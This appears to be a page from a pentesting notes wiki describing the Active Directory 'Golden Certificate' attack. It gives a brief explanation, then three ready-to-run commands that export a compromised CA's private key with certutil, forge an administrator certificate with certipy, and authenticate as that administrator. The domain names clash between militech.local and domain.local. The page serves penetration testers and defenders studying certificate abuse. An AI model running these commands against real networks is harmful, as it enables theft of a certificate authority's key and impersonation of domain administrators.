Golden Certificate

ABOUT

If an attacker obtains control over a CA server, he may be able to retrieve the private key associated with the CA cert, and use that private key to generate and sign client certificates. This means he could forge (and sign) certificate to authenticate as a powerful user for example.

There are A LOT of different ways and ESC's to get to CA. but when we do, we can abuse this attack.

EXECUTION

Export the CA’s private key

certutil -exportPFX my "CA-MILITECH" C:\ca.pfx

Forge a certificate for any domain user

certipy forge -ca-pfx ca.pfx -upn 'administrator@militech.local' -subject 'CN=Administrator,CN=Users,DC=domain,DC=local' -out forged_admin.pfx

Authenticate using that certificate

certipy auth -pfx forged_admin.pfx -username 'administrator' -domain 'domain.local' -dc-ip 13.13.13.13

RESOURCES

Certificate authority | The Hacker Recipes

PreviousESC16 NextPrinters

Last updated 2 months ago